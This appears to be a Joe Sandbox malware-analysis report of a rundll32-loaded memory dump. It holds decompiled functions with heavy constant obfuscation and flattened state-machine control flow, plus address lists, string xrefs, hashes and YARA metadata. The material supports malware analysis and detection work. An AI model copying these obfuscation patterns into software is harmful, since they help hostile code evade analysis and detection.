0x10004169
0x1000416d
0x10004172
0x10004175
0x10004178
0x1000417f
0x10004184
0x00000000
0x10004184
0x10004093
0x1000409f
0x00000000
0x10004213
0x100040ab
0x100041e4
0x100041e7
0x100041ec
0x100041ef
0x00000000
0x100041ef
0x100040b7
0x100040e1
0x100040ec
0x100040f1
0x100040f4
0x100040f5
0x100040f7
0x00000000
0x100040f9
0x1000410c
0x1000411f
0x10004123
0x10004128
0x1000412b
0x10004074
0x10004074
0x10004074
0x00000000
0x10004074
0x10004074
0x00000000
0x100040b9
0x100040bf
0x00000000
0x100040c5
0x100040d3
0x100040d9
0x100040da
0x100040da
0x10004074
0x10004074
0x10004074
0x00000000
0x10004074
0x10004074
0x100040bf
0x1000421d
0x1000421d
0x1000421d
0x10004135
0x10004140
0x10004141
0x10004146
0x10004148
0x10004149
0x1000414b
0x10004151
0x10004074
0x10004074
0x10004074
0x00000000
0x10004074
0x10004074
0x00000000
0x1000414b
0x100041ac
0x100041b3
0x100041b8
0x100041bb
0x100041be
0x100041c0
0x100041cc
0x100041d1
0x00000000
0x100041c2
0x100041c2
0x00000000
0x100041c2
0x00000000
0x100041d6
0x100041d6
0x100041d6
0x00000000
0x10004079

Strings

Ze2, xrefs: 100041D6
&4b), xrefs: 10004151
., xrefs: 10003EAE
&4b), xrefs: 100040B1
Gj, xrefs: 1000404A
jp, xrefs: 10003E2C
EM, xrefs: 10003F05
]H, xrefs: 10003E74

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &4b)$&4b)$.$EM$Gj$]H$jp$Ze2
API String ID: 0-3831357560
Opcode ID: fad2b6a6da34d5a79a599ec2a751447f4d4df015aa6644864e5b89069f857f56
Instruction ID: 8a5446e4f8035bc658c840a08d927aab7b0b9702947ac2468c43b6993038afce
Opcode Fuzzy Hash: fad2b6a6da34d5a79a599ec2a751447f4d4df015aa6644864e5b89069f857f56
Instruction Fuzzy Hash: 12C141B25083419BE354CF21C88944FBBE1FB94788F204A1DF595962A4E7B9D948CF87

Uniqueness

Uniqueness Score: -1.00%

Function 1000704B, Relevance: 10.2, Strings: 8, Instructions: 208
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1000704B() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _t185;
				void* _t186;
				signed int _t187;
				void* _t193;
				void* _t213;
				void* _t218;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				intOrPtr* _t226;
				signed int _t227;
				signed int* _t228;

				_t228 =  &_v68;
				_v60 = 0x1d43;
				_v60 = _v60 << 0xc;
				_t193 = 0x3977c092;
				_v60 = _v60 + 0x28c6;
				_v60 = _v60 ^ 0xdcba1064;
				_v60 = _v60 ^ 0xdd6f48a2;
				_v20 = 0xe9e;
				_v20 = _v20 | 0x1058ed95;
				_v20 = _v20 ^ 0x210197a0;
				_v20 = _v20 ^ 0x31590bf2;
				_v24 = 0x25e5;
				_v24 = _v24 >> 0xa;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x00002580;
				_v28 = 0x30bc;
				_v28 = _v28 | 0xe7a908b3;
				_v28 = _v28 * 0x23;
				_t218 = 0;
				_v28 = _v28 ^ 0xac22ac2a;
				_v56 = 0xe775;
				_v56 = _v56 >> 5;
				_v56 = _v56 + 0x1b94;
				_v56 = _v56 << 6;
				_v56 = _v56 ^ 0x0008bd00;
				_v32 = 0xff32;
				_v32 = _v32 >> 2;
				_v32 = _v32 | 0xd7112a41;
				_v32 = _v32 ^ 0xd7116591;
				_v64 = 0x688b;
				_v64 = _v64 + 0xadbd;
				_v64 = _v64 + 0x2af1;
				_v64 = _v64 + 0xffffcd5d;
				_v64 = _v64 ^ 0x00013bdf;
				_v68 = 0xd7fc;
				_v68 = _v68 | 0x40cef50a;
				_v68 = _v68 >> 2;
				_v68 = _v68 << 5;
				_v68 = _v68 ^ 0x0677a26b;
				_v4 = 0x4a94;
				_v4 = _v4 + 0xffffb7ad;
				_v4 = _v4 ^ 0x00004a42;
				_v8 = 0xf2c8;
				_t219 = 0x70;
				_v8 = _v8 / _t219;
				_v8 = _v8 ^ 0x000043de;
				_v36 = 0x586c;
				_t220 = 0x3c;
				_v36 = _v36 / _t220;
				_v36 = _v36 >> 7;
				_v36 = _v36 ^ 0x00005cc4;
				_v12 = 0x23ea;
				_v12 = _v12 + 0x3510;
				_v12 = _v12 ^ 0x00007e07;
				_v40 = 0xa101;
				_v40 = _v40 << 0xd;
				_v40 = _v40 + 0x4a49;
				_t221 = 0x14;
				_v40 = _v40 * 0xc;
				_v40 = _v40 ^ 0xf184ff7e;
				_v44 = 0xbfff;
				_v44 = _v44 | 0x69fcb387;
				_v44 = _v44 * 0x2d;
				_v44 = _v44 / _t221;
				_v44 = _v44 ^ 0x081251c3;
				_v48 = 0xf126;
				_t222 = 0x18;
				_v48 = _v48 / _t222;
				_v48 = _v48 << 1;
				_t223 = 0x4c;
				_t227 = _v4;
				_v48 = _v48 / _t223;
				_v48 = _v48 ^ 0x00005fbf;
				_t192 = _v4;
				_t224 = _v4;
				_v16 = 0x73ee;
				_v16 = _v16 << 0xc;
				_v16 = _v16 * 0x45;
				_v16 = _v16 ^ 0xf3f273d0;
				_v52 = 0x98da;
				_v52 = _v52 | 0x54ea2f47;
				_v52 = _v52 + 0xc0b4;
				_v52 = _v52 << 9;
				_v52 = _v52 ^ 0xd70e263f;
				while(1) {
					L1:
					_t213 = 0x5c;
					while(1) {
						L2:
						do {
							L3:
							while(_t193 != 0x1e3c7a) {
								if(_t193 == 0x1cae070b) {
									_t187 = E10017C1D(_v28, _v56, _t192, _t224, _v60, _v32);
									_t228 =  &(_t228[4]);
									_t227 = _t187;
									_t186 = 0x32ab8bb4;
									_t193 =  !=  ? 0x32ab8bb4 : 0x242cd2c8;
									_t213 = 0x5c;
									continue;
								} else {
									if(_t193 == 0x242cd2c8) {
										E1001F23C(_v40, _t192, _v44, _v48, _v16);
									} else {
										if(_t193 == _t186) {
											E10013C8B(_t227, _v64, _v68);
											_t218 =  !=  ? 1 : _t218;
											_t193 = 0x3667c679;
											while(1) {
												L1:
												_t213 = 0x5c;
												goto L2;
											}
										} else {
											if(_t193 == 0x336046fa) {
												_t226 =  *0x100221b0 + 0x10;
												while( *_t226 != _t213) {
													_t226 = _t226 + 2;
												}
												_t224 = _t226 + 2;
												_t193 = 0x1e3c7a;
												goto L2;
											} else {
												if(_t193 == 0x3667c679) {
													E1001F23C(_v4, _t227, _v8, _v36, _v12);
													_t228 =  &(_t228[3]);
													_t193 = 0x242cd2c8;
													while(1) {
														L1:
														_t213 = 0x5c;
														L2:
														goto L3;
													}
												} else {
													if(_t193 != 0x3977c092) {
														goto L21;
													} else {
														_t193 = 0x336046fa;
														continue;
													}
												}
											}
										}
									}
								}
								L24:
								return _t218;
							}
							_t185 = E1000DA66(_v52, _t213, _v20, _t193, _v24);
							_t192 = _t185;
							_t228 =  &(_t228[3]);
							if(_t185 == 0) {
								_t193 = 0x2f5bcc41;
								_t186 = 0x32ab8bb4;
								_t213 = 0x5c;
								goto L21;
							} else {
								_t193 = 0x1cae070b;
								goto L1;
							}
							goto L24;
							L21:
						} while (_t193 != 0x2f5bcc41);
						goto L24;
					}
				}
			}

0x1000704b
0x1000704e
0x10007058
0x1000705d
0x10007062
0x1000706a
0x10007072
0x1000707a
0x10007082
0x1000708a
0x10007092
0x1000709a
0x100070a2
0x100070a7
0x100070ac
0x100070b4
0x100070bc
0x100070cd
0x100070d1
0x100070d3
0x100070db
0x100070e3
0x100070e8
0x100070f0
0x100070f5
0x100070fd
0x10007105
0x1000710a
0x10007112
0x1000711a
0x10007122
0x1000712a
0x10007132
0x1000713a
0x10007142
0x1000714a
0x10007152
0x10007157
0x1000715c
0x10007164
0x1000716c
0x10007174
0x1000717c
0x1000718a
0x1000718f
0x10007195
0x1000719d
0x100071a9
0x100071ae
0x100071b4
0x100071b9
0x100071c1
0x100071c9
0x100071d1
0x100071d9
0x100071e1
0x100071e6
0x100071f3
0x100071f4
0x100071f8
0x10007200
0x10007208
0x10007215
0x1000721f
0x10007225
0x1000722d
0x1000723b
0x10007240
0x10007246
0x1000724e
0x10007251
0x10007255
0x10007259
0x10007261
0x10007265
0x10007269
0x10007271
0x1000727b
0x1000727f
0x10007287
0x1000728f
0x10007297
0x1000729f
0x100072a4
0x100072ac
0x100072ac
0x100072ae
0x100072af
0x100072af
0x100072b4
0x00000000
0x100072b4
0x100072c6
0x10007374
0x10007379
0x1000737c
0x10007385
0x1000738a
0x1000738f
0x00000000
0x100072cc
0x100072d2
0x100073e7
0x100072d8
0x100072da
0x1000734a
0x10007355
0x10007358
0x100072ac
0x100072ac
0x100072ae
0x00000000
0x100072ae
0x100072dc
0x100072e2
0x10007326
0x1000732e
0x1000732b
0x1000732b
0x10007333
0x10007336
0x00000000
0x100072e4
0x100072ea
0x10007311
0x10007316
0x10007319
0x100072ac
0x100072ac
0x100072ae
0x100072af
0x00000000
0x100072af
0x100072ec
0x100072f2
0x00000000
0x100072f8
0x100072f8
0x00000000
0x100072f8
0x100072f2
0x100072ea
0x100072e2
0x100072da
0x100072d2
0x100073ef
0x100073f8
0x100073f8
0x100073a2
0x100073a7
0x100073a9
0x100073ae
0x100073bc
0x100073c1
0x100073c6
0x00000000
0x100073b0
0x100073b0
0x00000000
0x100073b0
0x00000000
0x100073c7
0x100073c7
0x00000000
0x100073d3
0x100072af

Strings

G/T, xrefs: 1000728F
lX, xrefs: 1000719D
u, xrefs: 100070DB
s, xrefs: 10007269
%, xrefs: 1000709A
BJ, xrefs: 10007174
#, xrefs: 100071C1
IJ, xrefs: 100071E6

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: BJ$G/T$IJ$lX$u$#$%$s
API String ID: 0-3663283382
Opcode ID: 68cc132da59532e028890120555b8f8cf8d3ca96860295649d235a9d2345430b
Instruction ID: 8abdfc3377e969d007f48d575ba9e8df293e221e8c990af46830db3dd983c89b
Opcode Fuzzy Hash: 68cc132da59532e028890120555b8f8cf8d3ca96860295649d235a9d2345430b
Instruction Fuzzy Hash: 849149719083419FE358CF21C58541FBBE1FBC4798F109A1DF98A962A0D7B9CA498F47

Uniqueness

Uniqueness Score: -1.00%

Function 100142E2, Relevance: 10.2, Strings: 8, Instructions: 177
COMMONCrypto

Download Yara Rule

C-Code - Quality: 69%

			E100142E2(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				unsigned int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				void* __ecx;
				void* _t140;
				signed int _t160;
				void* _t166;
				void* _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int* _t196;

				_push(_a12);
				_t188 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E100056B2(_t140);
				_v584 = 0x92ce;
				_t196 =  &(( &_v612)[5]);
				_v584 = _v584 >> 8;
				_v584 = _v584 >> 5;
				_t166 = 0x97b55c3;
				_v584 = _v584 ^ 0x000049ba;
				_v560 = 0xd753;
				_v560 = _v560 << 0xc;
				_v560 = _v560 ^ 0x0d754d3b;
				_v564 = 0x7345;
				_v564 = _v564 + 0xffffb630;
				_v564 = _v564 ^ 0x0000444d;
				_v580 = 0xc1d6;
				_t189 = 0xd;
				_v580 = _v580 * 0x72;
				_v580 = _v580 >> 0xa;
				_v580 = _v580 ^ 0x00004587;
				_v604 = 0xf114;
				_v604 = _v604 / _t189;
				_v604 = _v604 >> 0xd;
				_t190 = 0x7d;
				_v604 = _v604 * 0x2d;
				_v604 = _v604 ^ 0x00006087;
				_v596 = 0x254a;
				_v596 = _v596 >> 6;
				_v596 = _v596 + 0xffff3bab;
				_v596 = _v596 ^ 0x53fe3558;
				_v596 = _v596 ^ 0xac01675f;
				_v572 = 0x4b54;
				_v572 = _v572 | 0x16c6d02e;
				_v572 = _v572 ^ 0x16c6fd39;
				_v612 = 0xa42e;
				_v612 = _v612 / _t190;
				_v612 = _v612 + 0xffff9850;
				_t191 = 0x17;
				_v612 = _v612 / _t191;
				_v612 = _v612 ^ 0x0b214225;
				_v588 = 0x5e84;
				_t192 = 0x45;
				_v588 = _v588 / _t192;
				_v588 = _v588 + 0xffffd4b8;
				_v588 = _v588 ^ 0xffff9394;
				_v592 = 0x37c6;
				_v592 = _v592 ^ 0xfeb5582a;
				_v592 = _v592 + 0x4179;
				_v592 = _v592 * 0x75;
				_v592 = _v592 ^ 0x690a6987;
				_v576 = 0x500e;
				_v576 = _v576 + 0xffff7079;
				_v576 = _v576 ^ 0xffffa0e4;
				_v568 = 0xf903;
				_v568 = _v568 ^ 0x69a540ca;
				_v568 = _v568 ^ 0x69a5fd2e;
				_v600 = 0x246b;
				_v600 = _v600 >> 0xe;
				_t193 = _v576;
				_v600 = _v600 * 0x3e;
				_v600 = _v600 * 0x59;
				_v600 = _v600 ^ 0x00007c65;
				_v608 = 0x26e8;
				_v608 = _v608 * 0x78;
				_v608 = _v608 >> 9;
				_v608 = _v608 << 7;
				_v608 = _v608 ^ 0x00048f02;
				L1:
				while(_t166 != 0x6d2a7ea) {
					if(_t166 == 0x97b55c3) {
						_t166 = 0x10e2cb79;
						continue;
					}
					if(_t166 != 0x10e2cb79) {
						if(_t166 == 0x184d4ecd) {
							_t160 = E10011196(_v572, _t193, _v612,  &_v556, _v588);
							_t196 =  &(_t196[3]);
							goto L8;
						} else {
							if(_t166 == 0x2f406389) {
								return E100078F0(_t193, _v592, _v576, _v568, _v600);
							}
							if(_t166 != 0x34204f7e) {
								L16:
								if(_t166 != 0x27ada575) {
									continue;
								} else {
									return _t160;
								}
							} else {
								_v556 = 0x22c;
								_t160 = E1000C951(_v564, _t193, _v580, _v604,  &_v556, _v596);
								_t196 =  &(_t196[4]);
								L8:
								asm("sbb ecx, ecx");
								_t166 = ( ~_t160 & 0xd7924461) + 0x2f406389;
								continue;
							}
						}
						L19:
						return _t160;
					}
					_push(_t166);
					_push(_t166);
					_t160 = E100034DF(_v608);
					_t193 = _t160;
					if(_t160 != 0xffffffff) {
						_t166 = 0x34204f7e;
						continue;
					}
					goto L19;
				}
				_push(_t188);
				_push( &_v556);
				if(_a4() == 0) {
					_t166 = 0x2f406389;
					goto L16;
				} else {
					_t166 = 0x184d4ecd;
					goto L1;
				}
				goto L19;
			}

0x100142ec
0x100142f3
0x100142f5
0x100142fc
0x10014303
0x10014305
0x1001430a
0x10014312
0x10014315
0x1001431c
0x10014321
0x10014326
0x1001432e
0x10014336
0x1001433b
0x10014343
0x1001434b
0x10014353
0x1001435b
0x1001436a
0x1001436d
0x10014371
0x10014376
0x1001437e
0x1001438e
0x10014392
0x1001439c
0x1001439f
0x100143a3
0x100143ab
0x100143b3
0x100143b8
0x100143c0
0x100143c8
0x100143d0
0x100143d8
0x100143e0
0x100143e8
0x100143f8
0x100143fc
0x10014408
0x1001440d
0x10014413
0x1001441b
0x10014427
0x1001442a
0x1001442e
0x10014436
0x1001443e
0x10014446
0x1001444e
0x1001445b
0x1001445f
0x10014467
0x1001446f
0x10014477
0x1001447f
0x10014487
0x10014494
0x100144a1
0x100144a9
0x100144b3
0x100144b7
0x100144c0
0x100144c4
0x100144cc
0x100144d9
0x100144dd
0x100144e2
0x100144e7
0x00000000
0x100144ef
0x10014501
0x100145a1
0x00000000
0x100145a1
0x10014509
0x10014511
0x10014571
0x10014576
0x00000000
0x10014513
0x10014515
0x00000000
0x100145ea
0x10014521
0x100145c5
0x100145cb
0x00000000
0x00000000
0x00000000
0x00000000
0x10014527
0x1001452f
0x10014546
0x1001454b
0x1001454e
0x10014552
0x1001455a
0x00000000
0x1001455a
0x10014521
0x100145f7
0x100145f7
0x100145f7
0x10014587
0x10014588
0x10014589
0x1001458e
0x10014595
0x10014597
0x00000000
0x10014597
0x00000000
0x10014595
0x100145a8
0x100145ad
0x100145b7
0x100145c3
0x00000000
0x100145b9
0x100145b9
0x00000000
0x100145b9
0x00000000

Strings

MD, xrefs: 10014353
&, xrefs: 100144CC
yA, xrefs: 1001444E
;Mu, xrefs: 1001433B
TK, xrefs: 100143D0
~O 4, xrefs: 10014597
~O 4, xrefs: 1001451B
e|, xrefs: 100144C4

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ;Mu$MD$TK$e|$yA$~O 4$~O 4$&
API String ID: 0-3555957702
Opcode ID: 31af485f9c8a2b5b624dfb714d0d2516dbbc443f0cc9696091e90e43e2690cbc
Instruction ID: 7a5233acb4f0b7343e1caab6bffd9fb5e66aa78ce2eca496758581743dfb795c
Opcode Fuzzy Hash: 31af485f9c8a2b5b624dfb714d0d2516dbbc443f0cc9696091e90e43e2690cbc
Instruction Fuzzy Hash: 1E7166B15093029FD368CF22D94991FBBE1EBC4708F408A1DF5959A2A0D775CA49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 10015AB8, Relevance: 10.2, Strings: 8, Instructions: 172
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E10015AB8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t155;
				void* _t175;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				void* _t182;
				intOrPtr* _t198;
				void* _t199;
				signed int* _t202;

				_push(_a16);
				_t198 = _a12;
				_push(_t198);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t155);
				_v64 = 0xce72;
				_t202 =  &(( &_v68)[6]);
				_v64 = _v64 << 9;
				_t199 = 0;
				_t182 = 0xa327820;
				_t176 = 0x1c;
				_v64 = _v64 / _t176;
				_v64 = _v64 + 0xffff8abd;
				_v64 = _v64 ^ 0x000e49bc;
				_v8 = 0xd869;
				_v8 = _v8 + 0xb7;
				_v8 = _v8 ^ 0x0000d921;
				_v36 = 0xa5f6;
				_v36 = _v36 + 0xffff8ce6;
				_t177 = 0x14;
				_v36 = _v36 / _t177;
				_v36 = _v36 ^ 0x00004e2d;
				_v40 = 0xc3ca;
				_v40 = _v40 + 0x908a;
				_t178 = 0x63;
				_v40 = _v40 / _t178;
				_v40 = _v40 ^ 0x00006c32;
				_v44 = 0xe24;
				_v44 = _v44 << 7;
				_v44 = _v44 * 0x22;
				_v44 = _v44 ^ 0x00f05026;
				_v24 = 0x7d7;
				_v24 = _v24 + 0xffffb711;
				_v24 = _v24 ^ 0xffffb7a2;
				_v48 = 0x8d07;
				_v48 = _v48 + 0xfffff854;
				_v48 = _v48 + 0xffffd8f0;
				_v48 = _v48 ^ 0x00001ba2;
				_v68 = 0x8813;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 + 0x19ce;
				_v68 = _v68 << 6;
				_v68 = _v68 ^ 0x0006522a;
				_v20 = 0x1e4f;
				_v20 = _v20 << 9;
				_v20 = _v20 ^ 0x003cb9d6;
				_v60 = 0xca0;
				_v60 = _v60 * 0x63;
				_v60 = _v60 ^ 0x63869485;
				_v60 = _v60 << 3;
				_v60 = _v60 ^ 0x1c13f119;
				_v28 = 0xf08e;
				_v28 = _v28 + 0x10ed;
				_v28 = _v28 + 0xa702;
				_v28 = _v28 ^ 0x0001ca56;
				_v52 = 0x57f8;
				_v52 = _v52 << 0xc;
				_v52 = _v52 >> 0xa;
				_t179 = 0x4c;
				_v52 = _v52 / _t179;
				_v52 = _v52 ^ 0x00006698;
				_v32 = 0xdab;
				_v32 = _v32 << 0xc;
				_v32 = _v32 * 0x65;
				_v32 = _v32 ^ 0x56475ce6;
				_v12 = 0xaec1;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 ^ 0x0000705e;
				_v16 = 0x4e43;
				_v16 = _v16 * 0x64;
				_v16 = _v16 ^ 0x001eb931;
				_v56 = 0x98b0;
				_v56 = _v56 + 0xe89c;
				_v56 = _v56 + 0xb4ee;
				_v56 = _v56 + 0xffffbf3b;
				_v56 = _v56 ^ 0x0001c98f;
				while(_t182 != 0xa327820) {
					if(_t182 == 0x239384b6) {
						E100069FC( &_v4, _v28, _v52, _v32, _v8, _v12, _t182, _a8, _t199, _t182, _t182, _v16, _v56);
						 *_t198 = _v4;
					} else {
						if(_t182 == 0x352093e2) {
							_push(_t182);
							_t199 = E100157E8(_v4);
							if(_t199 != 0) {
								_t182 = 0x239384b6;
								continue;
							}
						} else {
							if(_t182 != 0x3a4d2a27) {
								L10:
								if(_t182 != 0x12c90a5a) {
									continue;
								} else {
								}
							} else {
								_t175 = E100069FC( &_v4, _v36, _v40, _v44, _v64, _v24, _t182, _a8, 0, _t182, _t182, _v48, _v68);
								_t202 =  &(_t202[0xb]);
								if(_t175 != 0) {
									_t182 = 0x352093e2;
									continue;
								}
							}
						}
					}
					return _t199;
				}
				_t182 = 0x3a4d2a27;
				goto L10;
			}

0x10015abf
0x10015ac3
0x10015ac7
0x10015ac8
0x10015acc
0x10015ad0
0x10015ad1
0x10015ad2
0x10015ad7
0x10015adf
0x10015ae2
0x10015aed
0x10015aef
0x10015af6
0x10015afb
0x10015b01
0x10015b09
0x10015b11
0x10015b19
0x10015b21
0x10015b29
0x10015b31
0x10015b3d
0x10015b42
0x10015b48
0x10015b50
0x10015b58
0x10015b64
0x10015b67
0x10015b6b
0x10015b73
0x10015b7b
0x10015b85
0x10015b89
0x10015b91
0x10015b99
0x10015ba1
0x10015ba9
0x10015bb1
0x10015bb9
0x10015bc1
0x10015bc9
0x10015bd1
0x10015bd6
0x10015bde
0x10015be3
0x10015beb
0x10015bf3
0x10015bf8
0x10015c00
0x10015c0d
0x10015c11
0x10015c19
0x10015c1e
0x10015c26
0x10015c2e
0x10015c36
0x10015c3e
0x10015c46
0x10015c4e
0x10015c53
0x10015c60
0x10015c6d
0x10015c71
0x10015c79
0x10015c81
0x10015c8b
0x10015c8f
0x10015c97
0x10015c9f
0x10015ca4
0x10015cac
0x10015cb9
0x10015cbd
0x10015cc5
0x10015ccd
0x10015cd5
0x10015cdd
0x10015ce5
0x10015ced
0x10015cf7
0x10015d92
0x10015d9e
0x10015cf9
0x10015cfb
0x10015d46
0x10015d50
0x10015d55
0x10015d57
0x00000000
0x10015d57
0x10015cfd
0x10015d03
0x10015d60
0x10015d66
0x00000000
0x00000000
0x10015d68
0x10015d05
0x10015d2e
0x10015d33
0x10015d38
0x10015d3a
0x00000000
0x10015d3a
0x10015d38
0x10015d03
0x10015cfb
0x10015da9
0x10015da9
0x10015d5b
0x00000000

Strings

CN, xrefs: 10015CAC
x2, xrefs: 10015AEF
\GV, xrefs: 10015C8F
x2, xrefs: 10015CED
'*M:, xrefs: 10015D5B
'*M:, xrefs: 10015CFD
^p, xrefs: 10015CA4
2l, xrefs: 10015B6B

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: x2$ x2$'*M:$'*M:$2l$CN$^p$\GV
API String ID: 0-2340335227
Opcode ID: 56ecb1fefc8d69a2ba273b89fec3f9c42f7288201eef6b1703fe88df61fba167
Instruction ID: 479a953338cc6602b0d49e08dd5106ea6703caedab1e58faf33a3fe997809444
Opcode Fuzzy Hash: 56ecb1fefc8d69a2ba273b89fec3f9c42f7288201eef6b1703fe88df61fba167
Instruction Fuzzy Hash: C7710EB25093819FE354CF60C98991FBBE1FB98758F505A1CF2D54A2A0D3B6C949CF82

Uniqueness

Uniqueness Score: -1.00%

Function 10014693, Relevance: 9.1, Strings: 7, Instructions: 366
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E10014693(void* __ecx, void* __edx, signed int* _a4, intOrPtr _a8) {
				char _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				void* _t341;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				void* _t414;
				signed int* _t461;
				void* _t462;
				signed int _t463;
				signed int* _t466;
				void* _t469;

				_push(_a8);
				_t461 = _a4;
				_t462 = __ecx;
				_push(_t461);
				_push(__ecx);
				E100056B2(_t341);
				_v56 = _v56 & 0x00000000;
				_t466 =  &(( &_v192)[4]);
				_v60 = 0x669039;
				_v192 = 0x43d8;
				_t414 = 0x3f50d67;
				_v192 = _v192 + 0xbf58;
				_v192 = _v192 << 6;
				_t403 = 0x63;
				_v192 = _v192 / _t403;
				_v192 = _v192 ^ 0x0000f3e0;
				_v124 = 0xc4a4;
				_v124 = _v124 + 0x7400;
				_v124 = _v124 << 8;
				_v124 = _v124 ^ 0x01388cfe;
				_v156 = 0x33d6;
				_v156 = _v156 << 0xa;
				_v156 = _v156 << 2;
				_t404 = 0x3d;
				_v156 = _v156 / _t404;
				_v156 = _v156 ^ 0x000de827;
				_v64 = 0xebcf;
				_v64 = _v64 << 6;
				_v64 = _v64 ^ 0x003ae596;
				_v172 = 0x968a;
				_v172 = _v172 + 0xffffd46d;
				_v172 = _v172 << 3;
				_v172 = _v172 ^ 0xd191ab81;
				_v172 = _v172 ^ 0xd192e477;
				_v128 = 0xb9a8;
				_v128 = _v128 >> 0x10;
				_t405 = 0x76;
				_v128 = _v128 * 0x5e;
				_v128 = _v128 ^ 0x000020d6;
				_v140 = 0x545;
				_v140 = _v140 << 7;
				_v140 = _v140 ^ 0xc4bcec74;
				_v140 = _v140 ^ 0xc4be45d2;
				_v176 = 0xd323;
				_v176 = _v176 ^ 0x784c5418;
				_v176 = _v176 << 0xc;
				_v176 = _v176 / _t405;
				_v176 = _v176 ^ 0x01b2deaa;
				_v184 = 0x38a8;
				_v184 = _v184 * 0x62;
				_v184 = _v184 | 0x92387752;
				_v184 = _v184 * 0x36;
				_v184 = _v184 ^ 0xd91272a1;
				_v68 = 0x8687;
				_v68 = _v68 | 0x8796c77c;
				_v68 = _v68 ^ 0x8796e993;
				_v84 = 0x4bf9;
				_v84 = _v84 ^ 0xc2db0559;
				_v84 = _v84 ^ 0xc2db1bd4;
				_v152 = 0xec5b;
				_v152 = _v152 * 0x77;
				_t406 = 0x48;
				_v152 = _v152 / _t406;
				_v152 = _v152 << 1;
				_v152 = _v152 ^ 0x00037fba;
				_v96 = 0x6f52;
				_v96 = _v96 / _t406;
				_v96 = _v96 ^ 0x00007059;
				_v144 = 0x2d9f;
				_v144 = _v144 + 0x5a02;
				_v144 = _v144 + 0xffff7526;
				_t407 = 0x14;
				_v144 = _v144 * 0x64;
				_v144 = _v144 ^ 0xfffec776;
				_v104 = 0x3779;
				_v104 = _v104 + 0x6440;
				_v104 = _v104 ^ 0x0000977f;
				_v148 = 0x1d77;
				_v148 = _v148 * 0x7c;
				_v148 = _v148 / _t407;
				_v148 = _v148 + 0xffff1bf8;
				_v148 = _v148 ^ 0xffffcd98;
				_v100 = 0xd3a2;
				_v100 = _v100 | 0xe4f90cf7;
				_v100 = _v100 ^ 0xe4f9cd3c;
				_v180 = 0x5cac;
				_v180 = _v180 + 0xffff9624;
				_v180 = _v180 + 0xffff4ad1;
				_v180 = _v180 << 2;
				_v180 = _v180 ^ 0xfffcf483;
				_v108 = 0x7cb5;
